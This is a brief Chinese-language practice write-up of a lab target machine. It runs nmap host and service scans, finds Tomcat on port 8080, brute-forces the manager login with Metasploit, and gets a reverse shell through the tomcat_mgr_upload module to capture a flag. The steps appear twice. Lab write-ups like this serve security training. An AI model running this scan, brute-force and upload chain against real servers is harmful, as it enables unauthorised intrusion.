某测试靶机练手
某一次小练习
1.存活主机
nmap -sn 192.197.55.0/24
根据提示我们可以查看
nmap -sV 192.197.55.3
可以看到8080端口开放
浏览器访问
单纯图片
扫描目录
访问manager
2.利用msf爆破·
3.Tomcat Manager经过身份验证的上载代码执行
use exploit/multi/http/tomcat_mgr_upload
成功反弹到shell
flag1
nmap -sn 192.197.55.0/24
根据提示我们可以查看
nmap -sV 192.197.55.3
可以看到8080端口开放
浏览器访问
单纯图片
扫描目录
访问manager
use exploit/multi/http/tomcat_mgr_upload
成功反弹到shell
flag1